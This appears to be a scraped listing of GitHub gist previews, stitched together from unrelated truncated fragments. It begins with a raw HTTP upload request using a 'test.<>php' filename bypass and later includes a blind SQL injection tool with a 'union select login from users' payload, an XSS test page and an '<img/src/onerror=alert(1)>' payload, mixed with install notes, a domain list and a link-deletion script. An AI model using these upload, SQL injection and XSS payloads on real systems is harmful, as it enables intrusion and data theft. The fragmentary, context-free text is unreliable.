POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Based on https://blog.ropnop.com/installing-drozer-on-os-x-el-capitan/ | |
#Install recent python 2 and viritualenvwrapper | |
brew install python | |
brew upgrade python | |
pip install virtualenvwrapper | |
#At this point if you try to run mkvirtualenv, you'll get an error message. To resolve, follow the instructions indicated in /usr/local/bin/virtualenvwrapper.sh. In my current copy, they are: | |
# 1. Create a directory to hold the virtual environments. | |
# (mkdir $HOME/.virtualenvs). |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# bbs.py - Blind Binary Search | |
# Author: Laureline David | |
# | |
# Sample Usage: | |
# | |
# ./bbs.py --method POST | |
# --true-url http://website.com/login | |
# --url http://website.com/login | |
# --len "login=%27+union+select+login+from+users+where+length%28login%29+%3c%3d+{:d}+#&pass=abc" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
14 apple.com | |
40 vk.com | |
44 github.com | |
49 tumblr.com | |
55 dropbox.com | |
85 medium.com | |
87 paypal.com | |
92 icloud.com | |
100 booking.com | |
112 weebly.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<title>xss example</title> | |
<script> | |
//my awesome js | |
function a(){alert(1)} | |
</script> | |
</head> | |
<body> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# | |
# safeseh_inspect.py | |
# | |
# Copyright 2014 Spencer McIntyre | |
# | |
# Redistribution and use in source and binary forms, with or without | |
# modification, are permitted provided that the following conditions are | |
# met: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ = jQuery; | |
var indexToDelete = 0; | |
var numOfLinksToDelete = 200; | |
var waitUntilNextLinkInMs = 1000; | |
var waitForModalInMs = 50; | |
var confirmDelete = function() { | |
setTimeout(function() { | |
var $confirmationButtonInModal = $(".button-primary"); |
This page has migrated to:
https://superjamie.github.io/2016/04/28/reversing-for-dummies
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<img/src/onerror=alert(1)> |
OlderNewer